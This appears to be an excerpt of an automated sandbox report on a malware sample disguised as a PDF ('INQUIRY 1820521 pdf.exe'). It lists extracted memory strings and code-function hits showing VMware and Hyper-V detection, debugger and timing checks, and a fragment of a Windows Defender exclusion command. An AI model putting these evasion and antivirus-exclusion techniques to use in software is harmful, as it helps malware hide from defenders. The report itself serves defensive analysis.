          Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 0000000A.00000000.697754798.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000A.00000000.701320132.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.690336891.000000000B5A7000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA;|Y
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 0000000A.00000002.917434939.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 0000000A.00000000.696745704.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 0000000A.00000000.701814701.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 0000000A.00000000.696745704.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 0000000A.00000000.702010106.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 0000000A.00000000.696745704.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_00409A90 rdtsc 9_2_00409A90
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0040ACD0 LdrLoadDll,9_2_0040ACD0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0155B944 mov eax, dword ptr fs:[00000030h]9_2_0155B944
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0155B944 mov eax, dword ptr fs:[00000030h]9_2_0155B944
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0153B171 mov eax, dword ptr fs:[00000030h]9_2_0153B171
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0153B171 mov eax, dword ptr fs:[00000030h]9_2_0153B171
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0153C962 mov eax, dword ptr fs:[00000030h]9_2_0153C962
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01539100 mov eax, dword ptr fs:[00000030h]9_2_01539100
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01539100 mov eax, dword ptr fs:[00000030h]9_2_01539100
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01539100 mov eax, dword ptr fs:[00000030h]9_2_01539100
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0156513A mov eax, dword ptr fs:[00000030h]9_2_0156513A
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0156513A mov eax, dword ptr fs:[00000030h]9_2_0156513A
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01554120 mov eax, dword ptr fs:[00000030h]9_2_01554120
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01554120 mov eax, dword ptr fs:[00000030h]9_2_01554120
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01554120 mov eax, dword ptr fs:[00000030h]9_2_01554120
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01554120 mov eax, dword ptr fs:[00000030h]9_2_01554120
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01554120 mov ecx, dword ptr fs:[00000030h]9_2_01554120
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0153B1E1 mov eax, dword ptr fs:[00000030h]9_2_0153B1E1
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0153B1E1 mov eax, dword ptr fs:[00000030h]9_2_0153B1E1
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0153B1E1 mov eax, dword ptr fs:[00000030h]9_2_0153B1E1
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015C41E8 mov eax, dword ptr fs:[00000030h]9_2_015C41E8
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01562990 mov eax, dword ptr fs:[00000030h]9_2_01562990
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0156A185 mov eax, dword ptr fs:[00000030h]9_2_0156A185
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0155C182 mov eax, dword ptr fs:[00000030h]9_2_0155C182
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015B51BE mov eax, dword ptr fs:[00000030h]9_2_015B51BE
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015B51BE mov eax, dword ptr fs:[00000030h]9_2_015B51BE
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015B51BE mov eax, dword ptr fs:[00000030h]9_2_015B51BE
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015B51BE mov eax, dword ptr fs:[00000030h]9_2_015B51BE
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015661A0 mov eax, dword ptr fs:[00000030h]9_2_015661A0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015661A0 mov eax, dword ptr fs:[00000030h]9_2_015661A0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015B69A6 mov eax, dword ptr fs:[00000030h]9_2_015B69A6
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01550050 mov eax, dword ptr fs:[00000030h]9_2_01550050
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01550050 mov eax, dword ptr fs:[00000030h]9_2_01550050
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01601074 mov eax, dword ptr fs:[00000030h]9_2_01601074
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015F2073 mov eax, dword ptr fs:[00000030h]9_2_015F2073
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015B7016 mov eax, dword ptr fs:[00000030h]9_2_015B7016
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015B7016 mov eax, dword ptr fs:[00000030h]9_2_015B7016
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015B7016 mov eax, dword ptr fs:[00000030h]9_2_015B7016
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01604015 mov eax, dword ptr fs:[00000030h]9_2_01604015
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01604015 mov eax, dword ptr fs:[00000030h]9_2_01604015
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0156002D mov eax, dword ptr fs:[00000030h]9_2_0156002D
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0156002D mov eax, dword ptr fs:[00000030h]9_2_0156002D
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0156002D mov eax, dword ptr fs:[00000030h]9_2_0156002D
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0156002D mov eax, dword ptr fs:[00000030h]9_2_0156002D
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0156002D mov eax, dword ptr fs:[00000030h]9_2_0156002D
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0154B02A mov eax, dword ptr fs:[00000030h]9_2_0154B02A
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0154B02A mov eax, dword ptr fs:[00000030h]9_2_0154B02A
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0154B02A mov eax, dword ptr fs:[00000030h]9_2_0154B02A
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0154B02A mov eax, dword ptr fs:[00000030h]9_2_0154B02A
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015CB8D0 mov eax, dword ptr fs:[00000030h]9_2_015CB8D0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015CB8D0 mov ecx, dword ptr fs:[00000030h]9_2_015CB8D0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015CB8D0 mov eax, dword ptr fs:[00000030h]9_2_015CB8D0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015CB8D0 mov eax, dword ptr fs:[00000030h]9_2_015CB8D0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015CB8D0 mov eax, dword ptr fs:[00000030h]9_2_015CB8D0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015CB8D0 mov eax, dword ptr fs:[00000030h]9_2_015CB8D0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015358EC mov eax, dword ptr fs:[00000030h]9_2_015358EC
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01539080 mov eax, dword ptr fs:[00000030h]9_2_01539080
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015B3884 mov eax, dword ptr fs:[00000030h]9_2_015B3884
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015B3884 mov eax, dword ptr fs:[00000030h]9_2_015B3884
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0156F0BF mov ecx, dword ptr fs:[00000030h]9_2_0156F0BF
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0156F0BF mov eax, dword ptr fs:[00000030h]9_2_0156F0BF
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0156F0BF mov eax, dword ptr fs:[00000030h]9_2_0156F0BF
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015620A0 mov eax, dword ptr fs:[00000030h]9_2_015620A0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015620A0 mov eax, dword ptr fs:[00000030h]9_2_015620A0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015620A0 mov eax, dword ptr fs:[00000030h]9_2_015620A0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015620A0 mov eax, dword ptr fs:[00000030h]9_2_015620A0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015620A0 mov eax, dword ptr fs:[00000030h]9_2_015620A0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015620A0 mov eax, dword ptr fs:[00000030h]9_2_015620A0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015790AF mov eax, dword ptr fs:[00000030h]9_2_015790AF
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0153F358 mov eax, dword ptr fs:[00000030h]9_2_0153F358
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0153DB40 mov eax, dword ptr fs:[00000030h]9_2_0153DB40
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01563B7A mov eax, dword ptr fs:[00000030h]9_2_01563B7A
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01563B7A mov eax, dword ptr fs:[00000030h]9_2_01563B7A
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0153DB60 mov ecx, dword ptr fs:[00000030h]9_2_0153DB60
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01608B58 mov eax, dword ptr fs:[00000030h]9_2_01608B58
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015F131B mov eax, dword ptr fs:[00000030h]9_2_015F131B
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015B53CA mov eax, dword ptr fs:[00000030h]9_2_015B53CA
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015B53CA mov eax, dword ptr fs:[00000030h]9_2_015B53CA
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015603E2 mov eax, dword ptr fs:[00000030h]9_2_015603E2
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015603E2 mov eax, dword ptr fs:[00000030h]9_2_015603E2
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015603E2 mov eax, dword ptr fs:[00000030h]9_2_015603E2
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015603E2 mov eax, dword ptr fs:[00000030h]9_2_015603E2
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015603E2 mov eax, dword ptr fs:[00000030h]9_2_015603E2
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015603E2 mov eax, dword ptr fs:[00000030h]9_2_015603E2
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0155DBE9 mov eax, dword ptr fs:[00000030h]9_2_0155DBE9
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01562397 mov eax, dword ptr fs:[00000030h]9_2_01562397
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01605BA5 mov eax, dword ptr fs:[00000030h]9_2_01605BA5
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0156B390 mov eax, dword ptr fs:[00000030h]9_2_0156B390
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015F138A mov eax, dword ptr fs:[00000030h]9_2_015F138A
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01541B8F mov eax, dword ptr fs:[00000030h]9_2_01541B8F
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01541B8F mov eax, dword ptr fs:[00000030h]9_2_01541B8F
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015ED380 mov ecx, dword ptr fs:[00000030h]9_2_015ED380
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01564BAD mov eax, dword ptr fs:[00000030h]9_2_01564BAD
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01564BAD mov eax, dword ptr fs:[00000030h]9_2_01564BAD
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01564BAD mov eax, dword ptr fs:[00000030h]9_2_01564BAD
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01608A62 mov eax, dword ptr fs:[00000030h]9_2_01608A62
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015FEA55 mov eax, dword ptr fs:[00000030h]9_2_015FEA55
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015C4257 mov eax, dword ptr fs:[00000030h]9_2_015C4257
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01539240 mov eax, dword ptr fs:[00000030h]9_2_01539240
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01539240 mov eax, dword ptr fs:[00000030h]9_2_01539240
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01539240 mov eax, dword ptr fs:[00000030h]9_2_01539240
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01539240 mov eax, dword ptr fs:[00000030h]9_2_01539240
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0157927A mov eax, dword ptr fs:[00000030h]9_2_0157927A
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015EB260 mov eax, dword ptr fs:[00000030h]9_2_015EB260
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015EB260 mov eax, dword ptr fs:[00000030h]9_2_015EB260
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01535210 mov eax, dword ptr fs:[00000030h]9_2_01535210
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01535210 mov ecx, dword ptr fs:[00000030h]9_2_01535210
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01535210 mov eax, dword ptr fs:[00000030h]9_2_01535210
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01535210 mov eax, dword ptr fs:[00000030h]9_2_01535210
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0153AA16 mov eax, dword ptr fs:[00000030h]9_2_0153AA16
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0153AA16 mov eax, dword ptr fs:[00000030h]9_2_0153AA16
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01553A1C mov eax, dword ptr fs:[00000030h]9_2_01553A1C
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015FAA16 mov eax, dword ptr fs:[00000030h]9_2_015FAA16
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015FAA16 mov eax, dword ptr fs:[00000030h]9_2_015FAA16
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01548A0A mov eax, dword ptr fs:[00000030h]9_2_01548A0A
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01574A2C mov eax, dword ptr fs:[00000030h]9_2_01574A2C
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01574A2C mov eax, dword ptr fs:[00000030h]9_2_01574A2C
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01562ACB mov eax, dword ptr fs:[00000030h]9_2_01562ACB
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01562AE4 mov eax, dword ptr fs:[00000030h]9_2_01562AE4
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0156D294 mov eax, dword ptr fs:[00000030h]9_2_0156D294
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0156D294 mov eax, dword ptr fs:[00000030h]9_2_0156D294
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0154AAB0 mov eax, dword ptr fs:[00000030h]9_2_0154AAB0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0154AAB0 mov eax, dword ptr fs:[00000030h]9_2_0154AAB0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0156FAB0 mov eax, dword ptr fs:[00000030h]9_2_0156FAB0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015352A5 mov eax, dword ptr fs:[00000030h]9_2_015352A5
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015352A5 mov eax, dword ptr fs:[00000030h]9_2_015352A5
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015352A5 mov eax, dword ptr fs:[00000030h]9_2_015352A5
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015352A5 mov eax, dword ptr fs:[00000030h]9_2_015352A5
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015352A5 mov eax, dword ptr fs:[00000030h]9_2_015352A5
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01557D50 mov eax, dword ptr fs:[00000030h]9_2_01557D50
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01573D43 mov eax, dword ptr fs:[00000030h]9_2_01573D43
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015B3540 mov eax, dword ptr fs:[00000030h]9_2_015B3540
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0155C577 mov eax, dword ptr fs:[00000030h]9_2_0155C577
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0155C577 mov eax, dword ptr fs:[00000030h]9_2_0155C577
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01608D34 mov eax, dword ptr fs:[00000030h]9_2_01608D34
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01543D34 mov eax, dword ptr fs:[00000030h]9_2_01543D34
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01543D34 mov eax, dword ptr fs:[00000030h]9_2_01543D34
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01543D34 mov eax, dword ptr fs:[00000030h]9_2_01543D34
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01543D34 mov eax, dword ptr fs:[00000030h]9_2_01543D34
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01543D34 mov eax, dword ptr fs:[00000030h]9_2_01543D34
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01543D34 mov eax, dword ptr fs:[00000030h]9_2_01543D34
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01543D34 mov eax, dword ptr fs:[00000030h]9_2_01543D34
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01543D34 mov eax, dword ptr fs:[00000030h]9_2_01543D34
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01543D34 mov eax, dword ptr fs:[00000030h]9_2_01543D34
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01543D34 mov eax, dword ptr fs:[00000030h]9_2_01543D34
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01543D34 mov eax, dword ptr fs:[00000030h]9_2_01543D34
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01543D34 mov eax, dword ptr fs:[00000030h]9_2_01543D34
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01543D34 mov eax, dword ptr fs:[00000030h]9_2_01543D34
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0153AD30 mov eax, dword ptr fs:[00000030h]9_2_0153AD30
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015FE539 mov eax, dword ptr fs:[00000030h]9_2_015FE539
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015BA537 mov eax, dword ptr fs:[00000030h]9_2_015BA537
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01564D3B mov eax, dword ptr fs:[00000030h]9_2_01564D3B
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01564D3B mov eax, dword ptr fs:[00000030h]9_2_01564D3B
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01564D3B mov eax, dword ptr fs:[00000030h]9_2_01564D3B
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015B6DC9 mov eax, dword ptr fs:[00000030h]9_2_015B6DC9
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015B6DC9 mov eax, dword ptr fs:[00000030h]9_2_015B6DC9
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015B6DC9 mov eax, dword ptr fs:[00000030h]9_2_015B6DC9
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015B6DC9 mov ecx, dword ptr fs:[00000030h]9_2_015B6DC9
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015B6DC9 mov eax, dword ptr fs:[00000030h]9_2_015B6DC9
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015B6DC9 mov eax, dword ptr fs:[00000030h]9_2_015B6DC9
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015E8DF1 mov eax, dword ptr fs:[00000030h]9_2_015E8DF1
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0154D5E0 mov eax, dword ptr fs:[00000030h]9_2_0154D5E0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0154D5E0 mov eax, dword ptr fs:[00000030h]9_2_0154D5E0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015FFDE2 mov eax, dword ptr fs:[00000030h]9_2_015FFDE2
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015FFDE2 mov eax, dword ptr fs:[00000030h]9_2_015FFDE2
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015FFDE2 mov eax, dword ptr fs:[00000030h]9_2_015FFDE2
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015FFDE2 mov eax, dword ptr fs:[00000030h]9_2_015FFDE2
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_016005AC mov eax, dword ptr fs:[00000030h]9_2_016005AC
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_016005AC mov eax, dword ptr fs:[00000030h]9_2_016005AC
